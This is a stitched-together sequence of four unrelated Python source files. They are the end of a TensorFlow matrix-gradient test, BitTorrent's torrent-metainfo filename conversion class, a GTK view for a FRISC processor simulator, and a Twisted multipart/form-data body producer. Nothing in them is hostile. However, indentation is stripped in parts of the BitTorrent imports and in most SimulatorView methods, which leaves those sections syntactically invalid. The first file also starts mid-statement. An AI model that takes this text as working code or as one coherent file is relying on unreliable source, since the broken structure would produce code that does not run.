                         float32_tol_fudge=4.0,
                         adjoint=adjoint,
                         lower=lower))

  # Tests for gradients of unary matrix operations.
  for dtype in np.float32, np.float64:
    for size in 2, 5, 10:
      # We skip the rank 4, size 10 case: it is slow and conceptually covered
      # by the other cases.
      for extra in [(), (2,), (3,)] + [(3, 2)] * (size < 10):
        shape = extra + (size, size)
        name = '%s_%s' % (dtype.__name__, '_'.join(map(str, shape)))
        _AddTest(MatrixUnaryFunctorGradientTest, 'MatrixInverseGradient', name,
                 _GetMatrixUnaryFunctorGradientTest(linalg_ops.matrix_inverse,
                                                    dtype, shape))
        _AddTest(MatrixUnaryFunctorGradientTest, 'MatrixExponentialGradient',
                 name,
                 _GetMatrixUnaryFunctorGradientTest(
                     linalg_impl.matrix_exponential, dtype, shape))
        _AddTest(
            MatrixUnaryFunctorGradientTest, 'MatrixDeterminantGradient', name,
            _GetMatrixUnaryFunctorGradientTest(linalg_ops.matrix_determinant,
                                               dtype, shape))
        _AddTest(
            MatrixUnaryFunctorGradientTest, 'LogMatrixDeterminantGradient',
            name,
            _GetMatrixUnaryFunctorGradientTest(
                lambda x: linalg_ops.log_matrix_determinant(x)[1],
                dtype, shape))

        # The numerical Jacobian is consistently invalid for these four shapes
        # because the matrix square root of the perturbed input doesn't exist
        if shape in {(2, 5, 5), (3, 5, 5), (3, 10, 10), (3, 2, 5, 5)}:
          # Alternative shape that consistently produces a valid numerical Jacobian
          shape = extra + (size + 1, size + 1)
          name = '%s_%s' % (dtype.__name__, '_'.join(map(str, shape)))
        _AddTest(
            MatrixUnaryFunctorGradientTest, 'MatrixSquareRootGradient', name,
            _GetMatrixUnaryFunctorGradientTest(linalg_ops.matrix_square_root,
                                               dtype, shape))

  # Tests for gradients of matrix_solve_ls
  for dtype in np.float32, np.float64:
    for rows in 2, 5, 10:
      for cols in 2, 5, 10:
        for l2_regularization in 1e-6, 0.001, 1.0:
          shape = (rows, cols)
          name = '%s_%s_%s' % (dtype.__name__, '_'.join(map(str, shape)),
                               l2_regularization)
          _AddTest(
              MatrixBinaryFunctorGradientTest,
              'MatrixSolveLsGradient',
              name,
              # pylint: disable=g-long-lambda
              _GetMatrixBinaryFunctorGradientTest(
                  (lambda a, b, l=l2_regularization:
                   linalg_ops.matrix_solve_ls(a, b, l)),
                  dtype,
                  shape,
                  float32_tol_fudge=4.0))

  test_lib.main()
| |
# The contents of this file are subject to the BitTorrent Open Source License
# Version 1.1 (the License). You may not copy or use this file, in either
# source code or executable form, except in compliance with the License. You
# may obtain a copy of the License at http://www.bittorrent.com/license/.
#
# Software distributed under the License is distributed on an AS IS basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
# Written by Uoti Urpala
# required for Python 2.2
from __future__ import generators
import os
import sys
try:
from hashlib import sha1 as sha
except ImportError:
from sha import sha
from BitTorrent.obsoletepythonsupport import *
from BitTorrent.bencode import bencode
from BitTorrent import btformats
from BitTorrent import BTFailure, WARNING, ERROR
WINDOWS_UNSUPPORTED_CHARS ='"*/:<>?\|'
# 256-entry byte table for Python 2 str.translate: every character Windows
# forbids in filenames is mapped to '-'.
windows_translate = [chr(i) for i in range(256)]
for x in WINDOWS_UNSUPPORTED_CHARS:
    windows_translate[ord(x)] = '-'
windows_translate = ''.join(windows_translate)

# Mapping for Python 2 unicode.translate: UTF-16 surrogate code points
# (U+D800..U+DFFF) and Unicode noncharacters (U+FDD0..U+FDEF, U+FFFE/U+FFFF)
# are replaced with '-'.
noncharacter_translate = {}
for i in range(0xD800, 0xE000):
    noncharacter_translate[i] = ord('-')
for i in range(0xFDD0, 0xFDF0):
    noncharacter_translate[i] = ord('-')
for i in (0xFFFE, 0xFFFF):
    noncharacter_translate[i] = ord('-')

# Don't leak the loop variables at module scope.
del x, i
def set_filesystem_encoding(encoding, errorfunc):
    """
    Set the module-global `filesystem_encoding` used when converting
    torrent filenames to on-disk names.

    Pass encoding='' to autodetect via sys.getfilesystemencoding().
    Falls back to 'ascii' (reporting through `errorfunc`) when detection
    fails or the encoding is unusable.
    """
    global filesystem_encoding
    # Default until proven otherwise.
    filesystem_encoding = 'ascii'
    if encoding == '':
        try:
            sys.getfilesystemencoding
        except AttributeError:
            errorfunc(WARNING,
                      _("This seems to be an old Python version which "
                        "does not support detecting the filesystem "
                        "encoding. Assuming 'ascii'."))
            return
        encoding = sys.getfilesystemencoding()
        if encoding is None:
            errorfunc(WARNING,
                      _("Python failed to autodetect filesystem encoding. "
                        "Using 'ascii' instead."))
            return
    try:
        # Smoke-test the codec (Python 2 str.decode).  NOTE(review): bare
        # except is deliberate here — unknown codecs raise LookupError, but
        # broken codecs may raise other exceptions.
        'a1'.decode(encoding)
    except:
        errorfunc(ERROR,
                  _("Filesystem encoding '%s' is not supported. "
                    "Using 'ascii' instead.") % encoding)
        return
    filesystem_encoding = encoding
def generate_names(name, is_dir):
    """Yield an endless series of alternative names for `name`.

    Files keep their extension: 'a.b.c' -> 'a.b.0.c', 'a.b.1.c', ...
    Directories (and extensionless files) get a numeric suffix:
    'a' -> 'a.0', 'a.1', ...
    """
    if is_dir:
        prefix, suffix = name + '.', ''
    else:
        dot = name.rfind('.')
        if dot == -1:
            dot = len(name)
        prefix, suffix = name[:dot] + '.', name[dot:]
    counter = 0
    while True:
        yield '%s%d%s' % (prefix, counter, suffix)
        counter += 1
class ConvertedMetainfo(object):
    """
    Parsed, sanitized view of a bdecoded .torrent metainfo dict (Python 2).

    Filenames are converted both to canonical UTF-8 (`orig_files`) and to a
    filesystem-safe form (`files_fs`); any damage or lossy conversion found
    along the way is recorded in the bad_* flags and can be reported later
    with show_encoding_errors().
    """

    def __init__(self, metainfo):
        # Problem flags filled in during conversion.
        self.bad_torrent_wrongfield = False
        self.bad_torrent_unsolvable = False
        self.bad_torrent_noncharacter = False
        self.bad_conversion = False
        self.bad_windows = False
        self.bad_path = False
        self.reported_errors = False
        self.is_batch = False
        self.orig_files = None
        self.files_fs = None
        self.total_bytes = 0
        self.sizes = []
        self.comment = None

        btformats.check_message(metainfo, check_paths=False)
        info = metainfo['info']
        if info.has_key('length'):
            # Single-file torrent.
            self.total_bytes = info['length']
            self.sizes.append(self.total_bytes)
        else:
            # Multi-file ("batch") torrent.
            self.is_batch = True
            r = []
            self.orig_files = []
            self.sizes = []
            i = 0
            for f in info['files']:
                l = f['length']
                self.total_bytes += l
                self.sizes.append(l)
                path = self._get_attr_utf8(f, 'path')
                for x in path:
                    if not btformats.allowed_path_re.match(x):
                        if l > 0:
                            raise BTFailure(_("Bad file path component: ")+x)
                        # BitComet makes bad .torrent files with empty
                        # filename part
                        self.bad_path = True
                        break
                else:
                    # for-else: path was fully valid.  Keep each component
                    # as an (utf8, original) pair.
                    p = []
                    for x in path:
                        p.append((self._enforce_utf8(x), x))
                    path = p
                    self.orig_files.append('/'.join([x[0] for x in path]))
                    k = []
                    for u,o in path:
                        tf2 = self._to_fs_2(u)
                        k.append((tf2, u, o))
                    r.append((k,i))
                i += 1
            # If two or more file/subdirectory names in the same directory
            # would map to the same name after encoding conversions + Windows
            # workarounds, change them. Files are changed as
            # 'a.b.c'->'a.b.0.c', 'a.b.1.c' etc, directories or files without
            # '.' as 'a'->'a.0', 'a.1' etc. If one of the multiple original
            # names was a "clean" conversion, that one is always unchanged
            # and the rest are adjusted.
            r.sort()
            self.files_fs = [None] * len(r)
            prev = [None]
            res = []
            stack = [{}]
            for x in r:
                j = 0
                x, i = x
                # Skip the path components shared with the previous
                # (sorted) entry; res/stack keep the shared prefix.
                while x[j] == prev[j]:
                    j += 1
                del res[j:]
                del stack[j+1:]
                name = x[j][0][1]
                if name in stack[-1]:
                    # Collision within this directory: probe generated
                    # alternatives until a free one is found.
                    for name in generate_names(x[j][1], j != len(x) - 1):
                        name = self._to_fs(name)
                        if name not in stack[-1]:
                            break
                stack[-1][name] = None
                res.append(name)
                for j in range(j + 1, len(x)):
                    name = x[j][0][1]
                    stack.append({name: None})
                    res.append(name)
                self.files_fs[i] = os.path.join(*res)
                prev = x

        self.name = self._get_field_utf8(info, 'name')
        self.name_fs = self._to_fs(self.name)
        self.piece_length = info['piece length']
        self.is_trackerless = False
        if metainfo.has_key('announce'):
            self.announce = metainfo['announce']
        elif metainfo.has_key('nodes'):
            self.is_trackerless = True
            self.nodes = metainfo['nodes']
        if metainfo.has_key('comment'):
            self.comment = metainfo['comment']
        # 'pieces' is a flat string of 20-byte SHA-1 digests.
        self.hashes = [info['pieces'][x:x+20] for x in xrange(0,
                len(info['pieces']), 20)]
        self.infohash = sha(bencode(info)).digest()

    def show_encoding_errors(self, errorfunc):
        """Report (once) the most severe conversion problem found, through
        errorfunc(level, message)."""
        self.reported_errors = True
        if self.bad_torrent_unsolvable:
            errorfunc(ERROR,
                      _("This .torrent file has been created with a broken "
                        "tool and has incorrectly encoded filenames. Some or "
                        "all of the filenames may appear different from what "
                        "the creator of the .torrent file intended."))
        elif self.bad_torrent_noncharacter:
            errorfunc(ERROR,
                      _("This .torrent file has been created with a broken "
                        "tool and has bad character values that do not "
                        "correspond to any real character. Some or all of the "
                        "filenames may appear different from what the creator "
                        "of the .torrent file intended."))
        elif self.bad_torrent_wrongfield:
            errorfunc(ERROR,
                      _("This .torrent file has been created with a broken "
                        "tool and has incorrectly encoded filenames. The "
                        "names used may still be correct."))
        elif self.bad_conversion:
            errorfunc(WARNING,
                      _('The character set used on the local filesystem ("%s") '
                        'cannot represent all characters used in the '
                        'filename(s) of this torrent. Filenames have been '
                        'changed from the original.') % filesystem_encoding)
        elif self.bad_windows:
            errorfunc(WARNING,
                      _("The Windows filesystem cannot handle some "
                        "characters used in the filename(s) of this torrent. "
                        "Filenames have been changed from the original."))
        elif self.bad_path:
            errorfunc(WARNING,
                      _("This .torrent file has been created with a broken "
                        "tool and has at least 1 file with an invalid file "
                        "or directory name. However since all such files "
                        "were marked as having length 0 those files are "
                        "just ignored."))

    # At least BitComet seems to make bad .torrent files that have
    # fields in an arbitrary encoding but separate 'field.utf-8' attributes
    def _get_attr_utf8(self, d, attrib):
        """Return d[attrib], preferring the '<attrib>.utf-8' variant; flag a
        mismatch between the two."""
        v = d.get(attrib + '.utf-8')
        if v is not None:
            if v != d[attrib]:
                self.bad_torrent_wrongfield = True
        else:
            v = d[attrib]
        return v

    def _enforce_utf8(self, s):
        """Return `s` as valid UTF-8 (Python 2 str), replacing undecodable
        bytes and Unicode noncharacters with '-' and flagging the damage."""
        try:
            s = s.decode('utf-8')
        except:
            self.bad_torrent_unsolvable = True
            s = s.decode('utf-8', 'replace')
        t = s.translate(noncharacter_translate)
        if t != s:
            self.bad_torrent_noncharacter = True
        return t.encode('utf-8')

    def _get_field_utf8(self, d, attrib):
        """Combination of _get_attr_utf8 and _enforce_utf8."""
        r = self._get_attr_utf8(d, attrib)
        return self._enforce_utf8(r)

    def _fix_windows(self, name, t=windows_translate):
        """Replace Windows-forbidden characters; returns (fixed_name, bad)."""
        bad = False
        r = name.translate(t)
        # for some reason name cannot end with '.' or space
        if r[-1] in '. ':
            r = r + '-'
        if r != name:
            self.bad_windows = True
            bad = True
        return (r, bad)

    def _to_fs(self, name):
        """Convert a UTF-8 name to the filesystem encoding (name only)."""
        return self._to_fs_2(name)[1]

    def _to_fs_2(self, name):
        """Convert a UTF-8 name to the filesystem encoding.

        Returns (bad, converted_name) — note the order is reversed compared
        to _fix_windows; _to_fs() above picks element [1].
        """
        bad = False
        if sys.platform.startswith('win'):
            name, bad = self._fix_windows(name)
        name = name.decode('utf-8')
        try:
            r = name.encode(filesystem_encoding)
        except:
            self.bad_conversion = True
            bad = True
            r = name.encode(filesystem_encoding, 'replace')

        if sys.platform.startswith('win'):
            # encoding to mbcs with or without 'replace' will make the
            # name unsupported by windows again because it adds random
            # '?' characters which are invalid windows filesystem
            # character
            r, bad = self._fix_windows(r)
        return (bad, r)
| |
import yaml
import time
from gi.repository import Gtk, Gio, Gdk, Pango
from simulator import FRISCProcessor
from utils import *
# TODO: Search / go to line custom function
class SimulatorView( Gtk.Grid ):
    """
    GTK widget hosting the FRISC simulator UI: control buttons, the memory
    table, the register display and a go-to-line search box.
    """
    # ListStore columns: 0 breakpoint marker, 1 address (hex string),
    # 2 contents (hex), 3 contents (decimal), 4 source annotation.
    # NOTE(review): these are class-level mutable attributes, shared by all
    # instances — fine for a singleton view, but confirm only one
    # SimulatorView is ever created.
    memoryModel = Gtk.ListStore( str, str, str, int, str )
    program = ''
    memoryState = []
    flags = { 'paused' : False, 'stopped' : True }
    def __init__( self, parent, console, config ):
        """Build the simulator UI inside this grid.

        `console` is used for error reporting; `config` is accepted but not
        read in this method.
        """
        Gtk.Grid.__init__( self )
        self.parent = parent
        self.console = console
        self.set_name( 'simulator-grid' )
        self.simulator = FRISCProcessor( 65536 // 4 ) # TODO: Increase later, or on demand - place in settings
        self.init_options()
        # init_goto_line must run before init_memory_display: the memory
        # view registers self.searchEntry as its search entry.
        self.init_goto_line()
        self.init_memory_display()
        self.init_registers_display()
def init_options( self ):
optionsBox = Gtk.ButtonBox()
optionsBox.set_orientation( Gtk.Orientation.VERTICAL )
optionsBox.set_layout( Gtk.ButtonBoxStyle.START )
optionsBox.set_name( 'options-box' )
optionsBox.set_margin_left( 20 )
optionsBox.set_margin_right( 20 )
reloadButton = Gtk.Button( 'Reload' )
icon = Gio.ThemedIcon( name = "reload" )
image = Gtk.Image.new_from_gicon( icon, Gtk.IconSize.BUTTON )
reloadButton.set_image( image )
reloadButton.set_always_show_image( True )
reloadButton.set_alignment( 0.0, 0.5 )
runButton = Gtk.Button( 'Run' )
icon = Gio.ThemedIcon( name = "media-playback-start" )
image = Gtk.Image.new_from_gicon( icon, Gtk.IconSize.BUTTON )
runButton.set_image( image )
runButton.set_always_show_image( True )
runButton.set_alignment( 0.0, 0.5 )
stepButton = Gtk.Button( 'Step' )
icon = Gio.ThemedIcon( name = "next" )
image = Gtk.Image.new_from_gicon( icon, Gtk.IconSize.BUTTON )
stepButton.set_image( image )
stepButton.set_always_show_image( True )
stepButton.set_alignment( 0.0, 0.5 )
pauseButton = Gtk.Button( 'Pause' )
icon = Gio.ThemedIcon( name = "media-playback-pause" )
image = Gtk.Image.new_from_gicon( icon, Gtk.IconSize.BUTTON )
pauseButton.set_image( image )
pauseButton.set_always_show_image( True )
pauseButton.set_alignment( 0.0, 0.5 )
stopButton = Gtk.Button( 'Stop' )
icon = Gio.ThemedIcon( name = "media-playback-stop" )
image = Gtk.Image.new_from_gicon( icon, Gtk.IconSize.BUTTON )
stopButton.set_image( image )
stopButton.set_always_show_image( True )
stopButton.set_alignment( 0.0, 0.5 )
reloadButton.connect( 'clicked', self.on_reload_click )
runButton.connect( 'clicked', self.on_run_click )
stepButton.connect( 'clicked', self.on_step_click )
pauseButton.connect( 'clicked', self.on_pause_click )
stopButton.connect( 'clicked', self.on_stop_click )
self.reloadButton = reloadButton
self.runButton = runButton
self.stepButton = stepButton
self.pauseButton = pauseButton
self.stopButton = stopButton
optionsBox.pack_start( reloadButton, True, True, 0 )
optionsBox.pack_start( runButton, True, True, 0 )
optionsBox.pack_start( stepButton, True, True, 0 )
optionsBox.pack_start( pauseButton, True, True, 0 )
optionsBox.pack_start( stopButton, True, True, 0 )
self.attach( optionsBox, 0, 1, 1, 2 )
def init_memory_display( self ):
self.memoryView = Gtk.TreeView( self.memoryModel )
self.memoryView.set_name( 'memory-view' )
self.memoryView.connect( 'row-activated', self.on_row_dblclick )
self.memoryView.set_headers_visible( False )
self.memorySelection = self.memoryView.get_selection()
self.memoryView.set_search_column( 1 )
self.memoryView.set_search_entry( self.searchEntry )
self.memoryView.set_enable_search( True )
rendererBrkPt = Gtk.CellRendererText()
rendererBrkPt.set_padding( 10, 5 )
rendererBrkPt.props.foreground = '#F83F4C'
self.memoryView.append_column( Gtk.TreeViewColumn( 'Breakpoint', rendererBrkPt, text = 0 ) )
rendererAdr = Gtk.CellRendererText()
rendererAdr.set_padding( 10, 5 )
rendererAdr.props.font = 'bold'
self.memoryView.append_column( Gtk.TreeViewColumn( 'Address', rendererAdr, text = 1 ) )
rendererContX = Gtk.CellRendererText()
rendererContX.set_padding( 20, 5 )
self.memoryView.append_column( Gtk.TreeViewColumn( 'Contents (HEX)', rendererContX, text = 2 ) )
rendererContD = Gtk.CellRendererText()
rendererContD.set_padding( 20, 5 )
self.memoryView.append_column( Gtk.TreeViewColumn( 'Contents (DEC)', rendererContD, text = 3 ) )
rendererAnn = Gtk.CellRendererText()
rendererAnn.set_padding( 10, 5 )
rendererAnn.props.foreground = '#888'
rendererAnn.props.font = 'bold'
self.memoryView.append_column( Gtk.TreeViewColumn( 'Source Code', rendererAnn, text = 4 ) )
scrollBox = Gtk.ScrolledWindow()
scrollBox.set_hexpand( True )
scrollBox.set_vexpand( True )
scrollBox.add( self.memoryView )
self.attach( scrollBox, 1, 1, 1, 1 )
def init_registers_display( self ):
registerGrid = Gtk.Grid()
registerGrid.set_margin_left( 20 )
registerGrid.set_margin_right( 20 )
registerGrid.set_name( 'register-grid' )
self.registerDisplays = []
for i in range( 0, 10 ):
box = Gtk.HBox()
box.set_name( 'register-box' )
if i == 8:
box.set_name( 'pc-box' )
box.set_margin_bottom( 1 )
label = Gtk.Label( self.simulator.get_register( i ) )
label.set_name( 'register-value' )
self.registerDisplays.append( label )
name = Gtk.Label( FRISCProcessor.get_register_name( i ) )
name.set_name( 'register-name' )
name.set_width_chars( 5 )
box.pack_start( name, True, True, 0 )
box.pack_start( self.registerDisplays[ i ], True, True, 0 )
registerGrid.attach( box, 0, i, 1, 1 )
self.attach( registerGrid, 2, 1, 1, 2 )
def init_goto_line( self ):
box = Gtk.Box()
box.set_orientation( Gtk.Orientation.HORIZONTAL )
box.set_border_width( 10 )
label = Gtk.Label( 'Go to line:' )
label.set_name( 'goto-label' )
self.searchEntry = Gtk.SearchEntry()
self.searchEntry.set_text( '00000000' )
self.searchEntry.connect( 'search-changed', self.on_search )
box.pack_start( label, False, False, 0 )
box.pack_start( self.searchEntry, True, True, 0 )
self.attach( box, 1, 0, 1, 1 )
def load_simulator( self, file ):
self.program = file
self.simulator.load_program( file )
self.memoryModel.clear()
self.memoryState = []
for i in range( 0, self.simulator.MEM_SIZE // 4 ):
self.memoryState.append( {
'line' : '{:0>8X}'.format( 4*i ),
'contents' : self.simulator.get_word_from_mem( 4*i ),
'breakpoint' : False,
'annotation' : self.simulator.annotations[ 4*i ] } )
for l in self.memoryState:
self.memoryModel.append( self.get_memory_model_values( l ) )
    def on_reload_click( self, element ):
        # TODO: reload the current program (self.program) into the simulator.
        pass
def on_run_click( self, element ):
if self.is_paused(): self.flags[ 'paused' ] = False
self.runButton.set_sensitive( False )
self.pauseButton.set_sensitive( True )
while not self.is_breakpoint() and not self.is_paused() and self.run_step():
while Gtk.events_pending():
Gtk.main_iteration()
time.sleep( 0.25 )
print('iteration')
self.runButton.set_sensitive( True )
    def on_step_click( self, element ):
        # Execute exactly one instruction.
        self.run_step()
    def on_pause_click( self, element ):
        # Ask the run loop (on_run_click) to stop after the current step.
        self.flags[ 'paused' ] = True
        self.pauseButton.set_sensitive( False )
        self.runButton.set_sensitive( True )
    def on_stop_click( self, element ):
        # TODO: stop execution and reset the simulator state.
        pass
def on_row_dblclick( self, t, p, c ):
i = int( p.to_string() )
self.toggle_breakpoint( p, i )
    def on_search( self, element ):
        # TODO: scroll the memory view to the address in self.searchEntry.
        # Returning True marks the signal as handled.
        return True
def run_step( self ):
ret = True
try:
self.simulator.run_step()
self.update_registers()
self.select_active_row()
if self.simulator.last_changed_address != -1:
self.update_memory( self.simulator.last_changed_address )
self.simulator.last_changed_address = -1
except Exception as e:
self.console.show_message( str( e ), 'error' )
# TODO: What to do on error?
ret = False
return ret
    def clear_simulator( self ):
        # TODO: reset memory/register models to a blank state.
        pass
def update_memory( self, i ):
c = self.memoryState[ i ][ 'contents' ] = self.simulator.get_word_from_mem( 4*( i // 4 ) )
it = self.memoryModel.get_iter_from_string( str( i // 4 ) )
self.memoryModel.set( it, [ 2, 3 ], [ bin_to_pretty_hex( c ), from32( c ) ] )
def update_registers( self ):
for i in range( 0, 10 ):
self.registerDisplays[ i ].set_text( self.simulator.get_register( i ) )
    def select_active_row( self ):
        # Highlight the memory row of the instruction that was just executed.
        pc = self.simulator.get_program_counter()
        # NOTE(review): pc // 4 - 1 assumes the PC has already advanced past
        # the executed instruction -- confirm against the simulator's
        # run_step implementation.
        it = self.memoryModel.get_iter_from_string( str( pc // 4 - 1 ) )
        self.memorySelection.select_iter( it )
def toggle_breakpoint( self, p, i ):
self.memoryState[ i ][ 'breakpoint' ] = not self.memoryState[ i ][ 'breakpoint' ]
self.memoryModel.set_value( self.memoryModel.get_iter( p ), 0,
get_breakpoint_symbol( self.memoryState[ i ][ 'breakpoint' ] ) )
    def is_breakpoint( self ):
        # True when the word the program counter points at has its
        # breakpoint flag set (memoryState is indexed per 32-bit word).
        return self.memoryState[ self.simulator.get_program_counter() // 4 ][ 'breakpoint' ]
    def is_paused( self ):
        # Set by on_pause_click; polled by the run loop in on_run_click.
        return self.flags[ 'paused' ]
    def get_memory_model_values( self, l ):
        # Model columns: [breakpoint marker, address string, hex contents,
        # decoded contents, source annotation].
        return [ get_breakpoint_symbol( l[ 'breakpoint' ] ), l[ 'line' ],
                 bin_to_pretty_hex( l[ 'contents' ] ), from32( l[ 'contents' ]),
                 l[ 'annotation' ] ]
| |
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
from uuid import uuid4
from io import BytesIO
from contextlib import closing
from twisted.internet import defer, task
from twisted.web.iweb import UNKNOWN_LENGTH, IBodyProducer
from zope.interface import implementer
CRLF = b"\r\n"
@implementer(IBodyProducer)
class MultiPartProducer(object):
    """
    L{MultiPartProducer} takes parameters for an HTTP request and
    produces bytes in the multipart/form-data format defined in
    U{Multipart<http://tools.ietf.org/html/rfc2388>}
    and
    U{Mime format<http://tools.ietf.org/html/rfc2046>}.
    The encoded request is produced incrementally and the bytes are
    written to a consumer.
    Fields should have the form: [(parameter name, value), ...]
    Accepted values:
    * Unicode strings (in this case the parameter will be encoded with utf-8)
    * Tuples of (file name, content-type, L{IBodyProducer} object)
    Since MultiPartProducer can accept L{IBodyProducer}-like objects
    and these objects sometimes cannot be read from in an event-driven manner
    (e.g. when a L{FileBodyProducer} is passed in), it uses a L{Cooperator}
    instance to schedule reads from the underlying producers. This process
    is also paused and resumed based on notifications from the L{IConsumer}
    provider being written to.
    @ivar _fields: Sorted parameters, where all strings are enforced to be
        unicode and file objects stacked on bottom (to produce a human
        readable form-data request)
    @ivar _cooperate: A method like L{Cooperator.cooperate} which is used to
        schedule all reads.
    @ivar boundary: The generated boundary used in form-data encoding
    """
    def __init__(self, fields, boundary=None, cooperator=task):
        self._fields = list(_sorted_by_type(_converted(fields)))
        self._currentProducer = None
        self._cooperate = cooperator.cooperate
        # A caller-supplied boundary allows deterministic output (tests);
        # otherwise a random hex uuid is as good as any.
        self.boundary = boundary or uuid4().hex
        self.length = self._calculateLength()
    def startProducing(self, consumer):
        """
        Start a cooperative task which will read bytes from the input file and
        write them to C{consumer}. Return a L{Deferred} which fires after all
        bytes have been written.
        @param consumer: Any L{IConsumer} provider
        """
        self._task = self._cooperate(self._writeLoop(consumer))
        d = self._task.whenDone()
        def maybeStopped(reason):
            # A stopped task means stopProducing() was called; in that case
            # the Deferred returned from startProducing must never fire.
            reason.trap(task.TaskStopped)
            return defer.Deferred()
        d.addCallbacks(lambda ignored: None, maybeStopped)
        return d
    def stopProducing(self):
        """
        Permanently stop writing bytes from the file to the consumer by
        stopping the underlying L{CooperativeTask}.
        """
        if self._currentProducer:
            self._currentProducer.stopProducing()
        self._task.stop()
    def pauseProducing(self):
        """
        Temporarily suspend copying bytes from the input file to the consumer
        by pausing the L{CooperativeTask} which drives that activity.
        """
        if self._currentProducer:
            # Having a current producer means that we are in
            # the paused state because we've returned
            # the deferred of the current producer to the
            # the cooperator. So this request
            # for pausing us is actually a request to pause
            # our underlying current producer.
            self._currentProducer.pauseProducing()
        else:
            self._task.pause()
    def resumeProducing(self):
        """
        Undo the effects of a previous C{pauseProducing} and resume copying
        bytes to the consumer by resuming the L{CooperativeTask} which drives
        the write activity.
        """
        if self._currentProducer:
            self._currentProducer.resumeProducing()
        else:
            self._task.resume()
    def _calculateLength(self):
        """
        Determine how many bytes the overall form post would consume.
        The easiest way is to run the same generator that produces the
        request against a L{_LengthConsumer}, which only counts bytes
        (assuming the inputs are not modified from this point on).
        If the determination cannot be made, return C{UNKNOWN_LENGTH}.
        """
        consumer = _LengthConsumer()
        for i in self._writeLoop(consumer):
            pass
        return consumer.length
    def _getBoundary(self, final=False):
        """
        Returns a boundary line, either final (the one that ends the
        form data request) or regular (the one that separates the parts):
        --this-is-my-boundary
        """
        return b"--%s%s" % (
            self.boundary, b"--" if final else b"")
    def _writeLoop(self, consumer):
        """
        Return an iterator which generates the multipart/form-data
        request including the encoded objects
        and writes them to the consumer for each time it is iterated.
        """
        for index, (name, value) in enumerate(self._fields):
            # We don't write the CRLF of the first boundary:
            # HTTP request headers are already separated with CRLF
            # from the request body, another newline is possible
            # and should be considered as an empty preamble per rfc2046,
            # but is generally confusing, so we omit it when generating
            # the request. We don't write the Content-Type:
            # multipart/form-data header here either, as it's defined in
            # the context of the HTTP request headers, not the producer,
            # so we just generate the body.
            # It's also important to note that the boundary in the message
            # is defined not only by "--boundary-value" but
            # with CRLF characters before it and after the line.
            # This is very important.
            # The proper boundary is "CRLF--boundary-valueCRLF"
            consumer.write(
                (CRLF if index != 0 else "") + self._getBoundary() + CRLF)
            yield self._writeField(name, value, consumer)
        consumer.write(CRLF + self._getBoundary(final=True) + CRLF)
    def _writeField(self, name, value, consumer):
        # Unicode values are written synchronously (returns None); tuple
        # values delegate to an IBodyProducer and return its Deferred so
        # the cooperator waits for it before producing the next field.
        if isinstance(value, unicode):
            self._writeString(name, value, consumer)
        elif isinstance(value, tuple):
            filename, content_type, producer = value
            return self._writeFile(
                name, filename, content_type, producer, consumer)
    def _writeString(self, name, value, consumer):
        # A simple form field: Content-Disposition header, blank line,
        # then the utf-8 encoded value.
        cdisp = _Header("Content-Disposition", "form-data")
        cdisp.add_param("name", name)
        consumer.write(str(cdisp) + CRLF + CRLF)
        encoded = value.encode("utf-8")
        consumer.write(encoded)
        self._currentProducer = None
    def _writeFile(self, name, filename, content_type, producer, consumer):
        # A file part: disposition (with optional filename), content type,
        # optional content length, blank line, then the file body.
        cdisp = _Header("Content-Disposition", "form-data")
        cdisp.add_param("name", name)
        if filename:
            cdisp.add_param("filename", filename)
        consumer.write(str(cdisp) + CRLF)
        consumer.write(str(_Header("Content-Type", content_type)) + CRLF)
        if producer.length != UNKNOWN_LENGTH:
            consumer.write(
                str(_Header("Content-Length", producer.length)) + CRLF)
        consumer.write(CRLF)
        if isinstance(consumer, _LengthConsumer):
            # Length-calculation pass: don't drive the producer, just
            # account for its (possibly UNKNOWN_LENGTH) length.
            consumer.write(producer.length)
        else:
            self._currentProducer = producer
            def unset(val):
                self._currentProducer = None
                return val
            d = producer.startProducing(consumer)
            d.addCallback(unset)
            return d
def _escape(value):
    """
    Strip characters that could corrupt a header value: newlines make the
    form-data request unreadable for the majority of parsers, and an
    unescaped quote would terminate the parameter value early.
    """
    if not isinstance(value, (str, unicode)):
        value = unicode(value)
    for bad, good in ((u"\r", u""), (u"\n", u""), (u'"', u'\\"')):
        value = value.replace(bad, good)
    return value
def _enforce_unicode(value):
    """
    Coerce ``value`` to unicode so we never have to guess the encoding of
    binary strings later on.  Byte strings are accepted only when they
    decode as utf-8 (which includes ascii); anything else is rejected.
    To pass raw binary data, wrap a BytesIO in L{FileBodyProducer} instead.
    """
    if isinstance(value, unicode):
        return value
    if not isinstance(value, str):
        raise ValueError(
            "Unsupported field type: %s" % (value.__class__.__name__,))
    # A byte string: we have no idea what encoding it is in, so we only
    # accept it when it happens to be valid utf-8.
    try:
        return unicode(value, "utf-8")
    except UnicodeDecodeError:
        raise ValueError(
            "Supplied raw bytes that are not ascii/utf-8."
            " When supplying raw string make sure it's ascii or utf-8"
            ", or work with unicode if you are not sure")
def _converted(fields):
    """
    Generator normalising user-supplied fields: names become unicode,
    string values become unicode, and (filename, content type, producer)
    tuples are passed through with the filename coerced to unicode.
    """
    if hasattr(fields, "iteritems"):
        fields = fields.iteritems()
    for name, value in fields:
        name = _enforce_unicode(name)
        if isinstance(value, (str, unicode)):
            yield name, _enforce_unicode(value)
        elif isinstance(value, (tuple, list)):
            if len(value) != 3:
                raise ValueError(
                    "Expected tuple: (filename, content type, producer)")
            filename, content_type, producer = value
            if filename:
                filename = _enforce_unicode(filename)
            else:
                filename = None
            yield name, (filename, content_type, producer)
        else:
            raise ValueError(
                "Unsupported value, expected string, unicode "
                "or tuple (filename, content type, IBodyProducer)")
class _LengthConsumer(object):
    """
    A fake consumer used to compute the length of a multipart request:
    instead of storing the bytes written to it, it only accumulates their
    total length.

    @ivar length: The running length of the request, or C{UNKNOWN_LENGTH}
        once any field with an indeterminable length has been written.
    """
    def __init__(self):
        self.length = 0
    def write(self, value):
        if self.length is UNKNOWN_LENGTH:
            # A producer of unknown length was already seen; the total can
            # no longer be determined, so stop counting.
            return
        if value is UNKNOWN_LENGTH:
            self.length = value
            return
        if isinstance(value, (int, long)):
            # _writeFile writes a producer's numeric length directly.
            self.length += value
        else:
            self.length += len(value)
class _Header(object):
    """
    A tiny HTTP header serializer.  The standard Python header classes
    encode unicode values using the =?...?= MIME scheme, which is
    technically correct but not what HTTP peers expect -- they want raw
    utf-8 bytes, which is what this class emits.
    """
    def __init__(self, name, value, params=None):
        self.name = name
        self.value = value
        self.params = params or []
